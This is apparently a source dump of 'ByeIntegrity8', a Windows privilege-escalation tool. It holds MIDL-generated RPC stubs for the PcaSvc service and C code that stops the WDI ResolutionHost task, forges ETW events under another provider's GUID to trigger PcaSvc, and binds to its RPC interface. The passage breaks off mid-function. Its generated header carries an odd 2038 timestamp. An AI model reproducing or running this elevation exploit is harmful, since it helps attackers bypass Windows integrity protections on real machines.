 * Returns the long in CLIENT_CALL_RETURN.Simple as reported by the NDR engine.
 * Generated code: regenerate from pcasvc.idl rather than editing by hand.
 */
long RAiMonitorProcess(
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags)
{
    CLIENT_CALL_RETURN callResult = NdrClientCall3(
        (PMIDL_STUBLESS_PROXY_INFO)&PcaService_ProxyInfo,
        0,  /* procedure number: the single entry in PcaService_FormatStringOffsetTable */
        0,  /* pReturnValue: not used, the result comes back in callResult */
        bindingHandle,
        hProcess,
        unknown0,
        exeFileName,
        cmdLine,
        workingDir,
        flags);

    return (long)callResult.Simple;
}
125 |
126 |
127 | #if !defined(__RPC_WIN64__)
128 | #error Invalid build platform for this stub.
129 | #endif
130 |
/* -Oicf (DCE NDR) procedure format string for RAiMonitorProcess. Layout per
 * the -Oicf procedure header: handle type, Oi flags, RPC flags (long),
 * procedure number (0x0 at offset 6), x64 stack size (64), binding
 * descriptor, then one descriptor per parameter and one for the return.
 * hProcess travels as FC_UINT3264 (an integer, not a handle object); the
 * three string parameters are [unique] pointers to the FC_C_WSTRING at type
 * offset 2 of pcasvc__MIDL_TypeFormatString. Used only when the DCE syntax
 * is negotiated; the NDR64 equivalent is __midl_frag2 further down.
 * Generated data — do not hand-edit. */
static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =
{
0,
{

/* Procedure RAiMonitorProcess */

0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x18 ), /* 24 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */

/* Parameter hProcess */

/* 30 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0xb9, /* FC_UINT3264 */
0x0, /* 0 */

/* Parameter unknown0 */

/* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */ 0x8, /* FC_LONG */
0x0, /* 0 */

/* Parameter exeFileName */

/* 42 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ NdrFcShort( 0x2 ), /* Type Offset=2 */

/* Parameter cmdLine */

/* 48 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */ NdrFcShort( 0x2 ), /* Type Offset=2 */

/* Parameter workingDir */

/* 54 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 58 */ NdrFcShort( 0x2 ), /* Type Offset=2 */

/* Parameter flags */

/* 60 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 64 */ 0x8, /* FC_LONG */
0x0, /* 0 */

/* Return value */

/* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */

0x0
}
};
206 |
/* -Oicf type format string for PcaService. Offset 2 is a [unique] pointer
 * (FC_UP — NULL allowed on the wire) to the conformant wide string at
 * offset 4; all three string parameters of RAiMonitorProcess reference
 * offset 2. Generated data — do not hand-edit. */
static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */

0x0
}
};
221 |
/* Byte offset of each procedure inside pcasvc__MIDL_ProcFormatString, indexed
 * by procedure number; RAiMonitorProcess (opnum 0) starts at byte 0.
 * Referenced from PcaService_SyntaxInfo and PcaService_ProxyInfo. */
static const unsigned short PcaService_FormatStringOffsetTable[] =
{
0
};
226 |
227 |
228 |
229 | #endif /* defined(_M_AMD64)*/
230 |
231 |
232 |
233 | /* this ALWAYS GENERATED file contains the RPC client stubs */
234 |
235 |
236 | /* File created by MIDL compiler version 8.01.0622 */
237 | /* at Mon Jan 18 19:14:07 2038
238 | */
239 | /* Compiler settings for pcasvc.idl:
240 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
241 | protocol : all , ms_ext, c_ext, robust
242 | error checks: allocation ref bounds_check enum stub_data
243 | VC __declspec() decoration level:
244 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
245 | DECLSPEC_UUID(), MIDL_INTERFACE()
246 | */
247 | /* @@MIDL_FILE_HEADING( ) */
248 |
249 | #if defined(_M_AMD64)
250 |
251 |
252 |
253 |
254 | #if !defined(__RPC_WIN64__)
255 | #error Invalid build platform for this stub.
256 | #endif
257 |
258 |
259 | #include "ndr64types.h"
260 | #include "pshpack8.h"
261 |
262 |
/* NDR64 format fragments for RAiMonitorProcess. MIDL emits each piece of the
 * NDR64 description as a typed fragment: frag12/frag3 are base-type codes,
 * frag10 the conformant wchar_t string, frag9 the unique pointer to it, and
 * frag2 the procedure descriptor that stitches them together. Each is
 * declared extern here and defined static below (warning 4211 is disabled
 * at the top of the file for exactly this). */
typedef
NDR64_FORMAT_CHAR
__midl_frag12_t;
extern const __midl_frag12_t __midl_frag12;

typedef
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag10_t;
extern const __midl_frag10_t __midl_frag10;

typedef
struct _NDR64_POINTER_FORMAT
__midl_frag9_t;
extern const __midl_frag9_t __midl_frag9;

typedef
NDR64_FORMAT_CHAR
__midl_frag3_t;
extern const __midl_frag3_t __midl_frag3;

/* Procedure descriptor: header, bind extension, then seven parameter
 * records — six arguments plus the return value. */
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
struct _NDR64_PARAM_FORMAT frag4;
struct _NDR64_PARAM_FORMAT frag5;
struct _NDR64_PARAM_FORMAT frag6;
struct _NDR64_PARAM_FORMAT frag7;
struct _NDR64_PARAM_FORMAT frag8;
struct _NDR64_PARAM_FORMAT frag9;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;

typedef
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;
303 |
/* NDR64 base type used for the long parameters (unknown0, flags) and the
 * long return value of RAiMonitorProcess. */
static const __midl_frag12_t __midl_frag12 =
0x5 /* FC64_INT32 */;
306 |
/* NDR64 conformant wchar_t string (element size 2) that the three [string]
 * parameters of RAiMonitorProcess point to, via __midl_frag9. */
static const __midl_frag10_t __midl_frag10 =
{
/* *wchar_t */
{
/* *wchar_t */
0x64, /* FC64_CONF_WCHAR_STRING */
{
/* *wchar_t */
0,
0,
0,
0,
0,
0,
0,
0
},
(NDR64_UINT16) 2 /* 0x2 */
}
};
327 |
/* NDR64 [unique] pointer (FC64_UP, so NULL is representable on the wire) to
 * the wide string fragment above; shared by exeFileName, cmdLine and
 * workingDir. */
static const __midl_frag9_t __midl_frag9 =
{
/* *wchar_t */
0x21, /* FC64_UP */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
&__midl_frag10
};
336 |
/* NDR64 base type for hProcess: a 64-bit integer on x64 (the __int3264
 * parameter), i.e. the handle is sent as a number, not as a handle object. */
static const __midl_frag3_t __midl_frag3 =
0x7 /* FC64_INT64 */;
339 |
/* NDR64 procedure descriptor for RAiMonitorProcess, the counterpart of
 * pcasvc__MIDL_ProcFormatString used when NDR64 is negotiated. Header
 * (explicit handle, 64-byte stack, 7 parameters), the primitive-bind
 * extension, then one record per parameter with its type fragment,
 * attribute bits (the trailing comments spell them out) and x64 stack
 * offset; the last record is the long return value at offset 56.
 * Generated data — do not hand-edit; it must agree byte-for-byte with the
 * DCE description or one of the two syntaxes will marshal wrongly. */
static const __midl_frag2_t __midl_frag2 =
{
/* RAiMonitorProcess */
{
/* RAiMonitorProcess */ /* procedure RAiMonitorProcess */
(NDR64_UINT32) 17563712 /* 0x10c0040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasReturn, HasExtensions */
(NDR64_UINT32) 64 /* 0x40 */ , /* Stack size */
(NDR64_UINT32) 32 /* 0x20 */,
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 7 /* 0x7 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* hProcess */ /* parameter hProcess */
&__midl_frag3,
{
/* hProcess */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
},
{
/* unknown0 */ /* parameter unknown0 */
&__midl_frag12,
{
/* unknown0 */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
16 /* 0x10 */, /* Stack offset */
},
{
/* exeFileName */ /* parameter exeFileName */
&__midl_frag9,
{
/* exeFileName */
1,
1,
0,
1,
0,
0,
0,
0,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in] */
(NDR64_UINT16) 0 /* 0x0 */,
24 /* 0x18 */, /* Stack offset */
},
{
/* cmdLine */ /* parameter cmdLine */
&__midl_frag9,
{
/* cmdLine */
1,
1,
0,
1,
0,
0,
0,
0,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in] */
(NDR64_UINT16) 0 /* 0x0 */,
32 /* 0x20 */, /* Stack offset */
},
{
/* workingDir */ /* parameter workingDir */
&__midl_frag9,
{
/* workingDir */
1,
1,
0,
1,
0,
0,
0,
0,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in] */
(NDR64_UINT16) 0 /* 0x0 */,
40 /* 0x28 */, /* Stack offset */
},
{
/* flags */ /* parameter flags */
&__midl_frag12,
{
/* flags */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
48 /* 0x30 */, /* Stack offset */
},
{
/* long */ /* parameter long */
&__midl_frag12,
{
/* long */
0,
0,
0,
0,
1,
1,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [out], IsReturn, Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
56 /* 0x38 */, /* Stack offset */
}
};
535 |
/* Declared in the fragment list above but not referenced by any other
 * fragment or table in this file; MIDL emits it regardless. */
static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;
538 |
539 |
540 | #include "poppack.h"
541 |
542 |
/* NDR64 procedure table, indexed by procedure number: the only entry is the
 * RAiMonitorProcess descriptor. Installed as the NDR64 "ProcString" slot of
 * PcaService_SyntaxInfo below. */
static const FormatInfoRef PcaService_Ndr64ProcTable[] =
{
&__midl_frag2
};
547 |
548 |
/* MIDL_STUB_DESC for the PcaService client. Differs from the PcaService7
 * descriptor in pcasvc7_c.c in being dual-syntax: NDR library version
 * 0x60001, the 0x2000001 MIDL flags and a live proxy/server-info pointer.
 * pfnAllocate/pfnFree go through the MIDL_user_allocate/MIDL_user_free
 * macros to midl_user_allocate/midl_user_free in byeintegrity8.c, i.e. the
 * process heap. Generated data — do not hand-edit. */
static const MIDL_STUB_DESC PcaService_StubDesc =
{
(void *)& PcaService___RpcClientInterface,  /* RpcInterfaceInformation */
MIDL_user_allocate,                         /* pfnAllocate */
MIDL_user_free,                             /* pfnFree */
&PcaService__MIDL_AutoBindHandle,           /* implicit handle info (unused: explicit handle) */
0,
0,
0,
0,
pcasvc__MIDL_TypeFormatString.Format,       /* pFormatTypes */
1, /* -error bounds_check flag */
0x60001, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x2000001, /* MIDL flag */
0, /* cs routines */
(void *)& PcaService_ProxyInfo, /* proxy/server info */
0
};
572 |
/* Per-transfer-syntax tables the runtime selects from after negotiation:
 * entry 0 is DCE NDR (proc/type format strings + offset table), entry 1 is
 * NDR64 (the Ndr64ProcTable, cast to the generic unsigned short* slot).
 * Field order: TransferSyntax, DispatchTable, ProcString, FmtStringOffset,
 * TypeString, then three unused slots. */
static const MIDL_SYNTAX_INFO PcaService_SyntaxInfo [ 2 ] =
{
{
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
pcasvc__MIDL_ProcFormatString.Format,
PcaService_FormatStringOffsetTable,
pcasvc__MIDL_TypeFormatString.Format,
0,
0,
0
}
,{
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
0,
0 ,
(unsigned short *) PcaService_Ndr64ProcTable,
0,
0,
0,
0
}
};
596 |
/* Stubless proxy info handed to NdrClientCall3 by RAiMonitorProcess: the
 * stub descriptor, the DCE proc format string and offset table, the
 * preferred transfer syntax, and the two-entry syntax table above
 * (nCount = 2). This is the object that lets one stub serve both syntaxes. */
static const MIDL_STUBLESS_PROXY_INFO PcaService_ProxyInfo =
{
&PcaService_StubDesc,
pcasvc__MIDL_ProcFormatString.Format,
PcaService_FormatStringOffsetTable,
(RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,
2,
(MIDL_SYNTAX_INFO*)PcaService_SyntaxInfo

};
607 |
608 | #if _MSC_VER >= 1200
609 | #pragma warning(pop)
610 | #endif
611 |
612 |
613 | #endif /* defined(_M_AMD64)*/
614 |
615 |
--------------------------------------------------------------------------------
/ByeIntegrity8/byeintegrity8.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include "pcasvc.h"
8 | #include "pcasvc7.h"
9 | #include "resource.h"
10 |
/* HINSTANCE of this module without a GetModuleHandle call: __ImageBase is
 * the linker-provided symbol at the image's load address, so its address
 * is the module base. */
#define g_Instance ((HINSTANCE)&__ImageBase)

extern IMAGE_DOS_HEADER __ImageBase;
14 |
/* Empty VARIANT (VT_NULL). Presumably passed wherever an optional VARIANT
 * argument is required by the COM calls further down — the users are
 * outside this part of the file, confirm there. */
const VARIANT VARIANT_VAL = { {{VT_NULL, 0}} };

/* {EEF54E71-0661-422D-9A98-82FD4940B820}. By its name and the
 * EtwEventWriteNoRegistrationPtr typedef below this looks like the ETW
 * provider id the event is written under — confirm against the caller. */
const GUID AE_LOG = {
    .Data1 = 0x0EEF54E71,
    .Data2 = 0x661,
    .Data3 = 0x422D,
    .Data4 = { 0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20 }
};

/* Backing store for the two 4-byte zero payload items below. */
const ULONG ZERO_VALUE = 0;

/* ETW user-data block: two ULONG zeros followed by an empty terminator item.
 * Only the Ptr/Size members are set; the reserved union stays zero. */
const EVENT_DATA_DESCRIPTOR AE_EVENT_DESCRIPTOR[3] = {
    { .Ptr = (ULONGLONG)(ULONG_PTR)&ZERO_VALUE, .Size = sizeof(ULONG) },
    { .Ptr = (ULONGLONG)(ULONG_PTR)&ZERO_VALUE, .Size = sizeof(ULONG) },
    { .Ptr = (ULONGLONG)(ULONG_PTR)NULL,        .Size = 0 }
};
23 |
/* Descriptor of the ETW event written through EtwEventWriteNoRegistrationPtr
 * (typedef below): event id 0x1F46, channel 0x11, level 4 (informational),
 * keyword 0x4000000000000100. Which provider event these values select is
 * not documented here; the name suggests the one that makes PCA show its
 * dialog — confirm before changing any field. Deliberately non-const: the
 * API takes a writable PEVENT_DESCRIPTOR. */
EVENT_DESCRIPTOR MessageBoxEvent = {
    .Id      = 0x1F46,
    .Version = 0,
    .Channel = 0x11,
    .Level   = 0x4,
    .Opcode  = 0x0,
    .Task    = 0x0,
    .Keyword = 0x4000000000000100
};
33 |
34 | /* PcaMonitorProcess flags
35 | * Names guessed from reverse-engineering & behavioral analysis
36 | * NOCHAIN means don't use PCA chain; so don't resolve problems
37 | * */
38 | #define PCA_MONITOR_PROCESS_NORMAL 0
39 | #define PCA_MONITOR_PROCESS_NOCHAIN 1
40 | /* Program will be monitored for installer behavior
41 | * If exe is elevated x86, it will be monitored as a
42 | * legacy installer. DM dialog will show when exe
43 | * terminates with abnormal exit code (other than 0). */
44 | #define PCA_MONITOR_PROCESS_AS_INSTALLER 2
45 |
46 | /* PcaMonitorProcess/RAiMonitorProcess pointer prototype. Returns standard system error code.
47 | * RAiMonitorProcess returns error codes from PcaSvc & RPC_STATUS error codes.
48 | * PcaSvc needs to be running. It can be started by the INTERACTIVE users.
49 | * This function will start it for us if it's stopped, so no need to worry about that
50 | * Taken & names guessed from reverse-engineering & behavioral analysis */
51 |
52 | /* typedef DWORD(WINAPI* PcaMonitorProcessPtr)(
53 | HANDLE hProcess, // handle to process to be monitored
54 | int unknown0, // always set to 1
55 | PWSTR exeFileName, // full path name to program executable file
56 | PWSTR cmdLine, // command line, usually exeName surrounded with quotes
57 | PWSTR workingDir, // working directory of program to be monitored, no trailing backslash
58 | ULONG flags // set of flags to modify monitoring behavior
59 | ); */
60 |
61 | /* RAiNotifyUserCallbackExceptionProcess
62 | * RPC call used in Windows 7 to tell PCA that an unhandled exception
63 | has occurred during a user callback. PCA will launch the DM after the process
64 | * exits or after 10 seconds of being called, whichever comes first. Returns
65 | * standard system error code.
66 | *
67 | * Usually this function is called from PcaSvc itself via NdrServerCall[All][2]. */
68 |
69 | /* long RAiNotifyUserCallbackExceptionProcess(
70 | wchar_t* exePathName, // full path name to program executable file
71 | long unknown0, // always set to 1
72 | long processId // process ID for PcaSvc to use
73 | ); */
74 |
75 | /* Writes an event's information without registering its provider
76 | Definition taken from Geoff Chappell's website */
typedef ULONG(WINAPI* EtwEventWriteNoRegistrationPtr)(
    LPGUID providerId,                  /* provider GUID stamped on the event as given;
                                         * NOTE(review): with no registration step the GUID
                                         * alone does not prove which process wrote the event */
    PEVENT_DESCRIPTOR eventDescriptor,  /* Id / Level / Keyword etc. of the event */
    ULONG userDataCount,                /* number of entries in userData */
    PEVENT_DATA_DESCRIPTOR userData     /* pointer/size pairs forming the payload */
);                                      /* returns a Win32 status; ERROR_SUCCESS on success */
83 |
/* Allocation hook required by the MIDL-generated RPC stubs.
 * Memory comes from the process heap; release it with midl_user_free().
 * Returns NULL when the heap cannot satisfy the request. */
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    HANDLE processHeap = GetProcessHeap();
    return HeapAlloc(processHeap, 0, cBytes);
}
88 |
/* Free hook required by the MIDL-generated RPC stubs; the counterpart of
 * midl_user_allocate(). The HeapFree() result is intentionally ignored,
 * as in the original. */
void __RPC_USER midl_user_free(void* pBuffer)
{
    HANDLE processHeap = GetProcessHeap();
    (void)HeapFree(processHeap, 0, pBuffer);
}
93 |
/* Fills buffer with 8 uppercase ASCII letters ('A'..'Z') followed by L'\0'.
 * buffer must have room for at least 9 WCHARs.
 *
 * The letters are derived from QueryPerformanceCounter() pushed through a
 * rotate/xor mixing step, so the result is merely hard to guess, not
 * cryptographically random. wmain() uses it as a temporary registry key name. */
void AzGenRandomString(
    PWSTR buffer
)
{
    LARGE_INTEGER pc;
    for (int i = 0; i < 8; ++i) {
        QueryPerformanceCounter(&pc);

        /* Mix both halves of the counter. The rotate counts are not reduced
         * modulo 64 here; this relies on RotateLeft64/RotateRight64 (the
         * _rotl64/_rotr64 intrinsics) masking the count — TODO confirm. */
        pc.QuadPart = RotateLeft64((ULONGLONG)(~pc.HighPart) ^ (ULONGLONG)(RotateRight64((ULONGLONG)pc.LowPart << 32,
            (int)(pc.LowPart & ~0xFUL))), (int)(pc.HighPart & ~pc.LowPart));
        pc.HighPart = pc.HighPart & ~pc.LowPart;
        /* 90 - 65 + 1 == 26 letters, offset 65 == 'A' */
        buffer[i] = ((ULONG)pc.HighPart % (90 - 65 + 1)) + 65;
    }
    buffer[8] = L'\0';
}
109 |
/* Stops the scheduled task "\Microsoft\Windows\WDI\ResolutionHost" if it is
 * currently running, using the Task Scheduler COM API.
 *
 * COM must already be initialised on the calling thread (both callers in
 * wmain() call CoInitializeEx() first). trace switches diagnostic output on.
 * Returns the HRESULT of the last COM call that was made.
 *
 * NOTE(review): when SysAllocString() fails the function jumps to eof with
 * hr still holding the previous success code, so the caller sees success.
 * NOTE(review): taskService is not initialised; the Release() at eof relies
 * on CoCreateInstance() nulling the out pointer on failure — TODO confirm,
 * otherwise initialise it to NULL like wdiFolder / wdiTask. */
HRESULT BiStopWdiTask(
    BOOLEAN trace
)
{
    HRESULT hr;
    ITaskService* taskService;
    BSTR string;
    ITaskFolder* wdiFolder = NULL;
    IRegisteredTask* wdiTask = NULL;
    TASK_STATE taskState;

    hr = CoCreateInstance(&CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER,
        &IID_ITaskService, &taskService);
    if (!SUCCEEDED(hr)) {
        if (trace)
            wprintf(L"CoCreateInstance() failed. HRESULT: %#010x\n", hr);
        goto eof;
    }

    /* VARIANT_VAL is defined outside this excerpt; presumably empty VARIANTs,
     * i.e. connect to the local machine as the current user — verify. */
    hr = taskService->lpVtbl->Connect(taskService, VARIANT_VAL, VARIANT_VAL,
        VARIANT_VAL, VARIANT_VAL);
    if (!SUCCEEDED(hr)) {
        if (trace)
            wprintf(L"ITaskService::Connect() failed. HRESULT: %#010x\n", hr);
        goto eof;
    }

    /* Folder path, then task name, each passed as a BSTR that is freed
     * immediately after the call. */
    string = SysAllocString(L"Microsoft\\Windows\\WDI");
    if (!string) {
        if (trace)
            _putws(L"SysAllocString() (0) failed. No memory");
        goto eof;   /* hr not updated here (see note above) */
    }
    hr = taskService->lpVtbl->GetFolder(taskService, string, &wdiFolder);
    SysFreeString(string);
    if (!SUCCEEDED(hr)) {
        if (trace)
            wprintf(L"ITaskService::GetFolder() failed. HRESULT: %#010x\n", hr);
        goto eof;
    }

    string = SysAllocString(L"\\ResolutionHost");
    if (!string) {
        if (trace)
            _putws(L"SysAllocString() (1) failed. No memory");
        goto eof;   /* hr not updated here (see note above) */
    }
    hr = wdiFolder->lpVtbl->GetTask(wdiFolder, string, &wdiTask);
    SysFreeString(string);
    if (!SUCCEEDED(hr)) {
        if (trace)
            wprintf(L"ITaskFolder::GetTask() failed. HRESULT: %#010x\n", hr);
        goto eof;
    }

    /* Only a running task is stopped; any other state is left untouched
     * and reported as success. */
    hr = wdiTask->lpVtbl->get_State(wdiTask, &taskState);
    if (!SUCCEEDED(hr)) {
        if (trace)
            wprintf(L"IRegisteredTask::get_State() failed. HRESULT: %#010x\n", hr);
        goto eof;
    }
    if (taskState == TASK_STATE_RUNNING) {
        hr = wdiTask->lpVtbl->Stop(wdiTask, 0);   /* flags: 0 (reserved) */
        if (!SUCCEEDED(hr)) {
            if (trace)
                wprintf(L"IRegisteredTask::Stop() failed. HRESULT: %#010x\n", hr);
            goto eof;
        }
    }

eof:
    /* Release in reverse acquisition order. */
    if (wdiTask)
        wdiTask->lpVtbl->Release(wdiTask);
    if (wdiFolder)
        wdiFolder->lpVtbl->Release(wdiFolder);
    if (taskService)
        taskService->lpVtbl->Release(taskService);
    return hr;
}
189 |
/* Child mode '0' of wmain(): writes two events under the AE_LOG provider
 * GUID through ntdll!EtwEventWriteNoRegistration, i.e. without this process
 * registering as that provider. The first event uses MessageBoxEvent as-is
 * (Id 0x1F46), the second has Id patched to 0x1F48; both carry
 * AE_EVENT_DESCRIPTOR as payload. The comments below state which PcaSvc
 * detections these Ids correspond to.
 *
 * Returns 0 (ERROR_SUCCESS) on success; otherwise the GetLastError() value
 * from the module/export lookup, or the status of the ETW write, narrowed
 * from ULONG to int.
 *
 * NOTE(review): since no provider registration happens, a consumer cannot
 * distinguish these events from the genuine provider's by GUID alone; the
 * writer's process identity in the event header is presumably the only
 * attribution signal left — confirm against the ETW consumer in use. */
int BiTriggerMain(
    void
)
{
    ULONG win32Status;
    EtwEventWriteNoRegistrationPtr EtwEventWriteNoRegistration;
    HMODULE hModule;

    /* Resolve the undocumented export at runtime; ntdll is always mapped. */
    hModule = GetModuleHandleW(L"ntdll.dll");
    if (hModule) {
        EtwEventWriteNoRegistration = (EtwEventWriteNoRegistrationPtr)GetProcAddress(hModule, "EtwEventWriteNoRegistration");
        if (!EtwEventWriteNoRegistration)
            return (int)GetLastError();
    }
    else
        return (int)GetLastError();

    // write an event that PcaSvc will catch that indicates a version message box has been detected
    win32Status = EtwEventWriteNoRegistration((LPGUID)&AE_LOG, &MessageBoxEvent,
        3, (PEVENT_DATA_DESCRIPTOR)&AE_EVENT_DESCRIPTOR);
    if (win32Status != ERROR_SUCCESS)
        return win32Status;

    /* Mutates the global template; it is not restored afterwards. */
    MessageBoxEvent.Id = 0x1F48;
    // write an event that PcaSvc will catch that indicates a message box with an error icon has been detected
    win32Status = EtwEventWriteNoRegistration((LPGUID)&AE_LOG, &MessageBoxEvent,
        3, (PEVENT_DATA_DESCRIPTOR)&AE_EVENT_DESCRIPTOR);

    return win32Status;
}
220 |
/* Creates an authenticated ncalrpc binding to the RPC interface
 * {0767a036-0d22-48aa-ba69-b619480f38cb} and stores it in *bindingHandle.
 * The caller owns the returned binding and frees it with RpcBindingFree().
 * Returns RPC_S_OK on success; on failure the partially built binding is
 * freed and the RPC status is returned.
 *
 * The security QOS asks for mutual authentication against the LocalSystem
 * SID, so (per RPC_SECURITY_QOS_V3 semantics) the call only completes if the
 * server on the other end is running as SYSTEM.
 *
 * NOTE(review): CreateWellKnownSid() returns a BOOL. When it fails, the
 * function jumps to eof with rStatus == 0, i.e. it reports RPC_S_OK without
 * having set *bindingHandle; the caller (wmain) then carries a NULL binding.
 * NOTE(review): the error message after RpcBindingFromStringBindingW()
 * names RpcStringBindingComposeW() (copy/paste), which misleads triage. */
RPC_STATUS BiCreatePcaRpcBinding(
    RPC_BINDING_HANDLE* bindingHandle
)
{
    RPC_WSTR strBinding;
    RPC_BINDING_HANDLE hBinding = NULL;
    BYTE sid[SECURITY_MAX_SID_SIZE];
    DWORD sidSize = SECURITY_MAX_SID_SIZE;
    RPC_SECURITY_QOS_V3_W security;
    RPC_STATUS rStatus;

    /* Interface UUID + local (ncalrpc) protocol sequence, no explicit endpoint:
     * the endpoint mapper resolves it. */
    rStatus = RpcStringBindingComposeW(L"0767a036-0d22-48aa-ba69-b619480f38cb",
        L"ncalrpc", NULL, NULL, NULL, &strBinding);
    if (rStatus) {
        wprintf(L"RpcStringBindingComposeW() failed. Error: %ld\n", rStatus);
        goto eof;
    }
    rStatus = RpcBindingFromStringBindingW(strBinding, &hBinding);
    RpcStringFreeW(&strBinding);
    if (rStatus) {
        wprintf(L"RpcStringBindingComposeW() failed. Error: %ld\n", rStatus);   /* message names the wrong API */
        goto eof;
    }
    /* Option 12 is presumably RPC_C_OPT_CALL_TIMEOUT (milliseconds), giving a
     * 200 ms call timeout — prefer the named constant so this is checkable. */
    rStatus = RpcBindingSetOption(hBinding, 12, 200);
    if (rStatus) {
        wprintf(L"RpcBindingSetOption() failed. Error: %ld\n", rStatus);
        goto eof;
    }
    /* BOOL stored in an RPC_STATUS: TRUE here means success (see note above). */
    rStatus = (RPC_STATUS)CreateWellKnownSid(WinLocalSystemSid, NULL, sid, &sidSize);
    if (!rStatus) {
        wprintf(L"CreateWellKnownSid() failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    /* Version-3 QOS: impersonation level plus the expected server SID. */
    ZeroMemory(&security, sizeof(RPC_SECURITY_QOS_V3_W));
    security.Version = 3;
    security.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
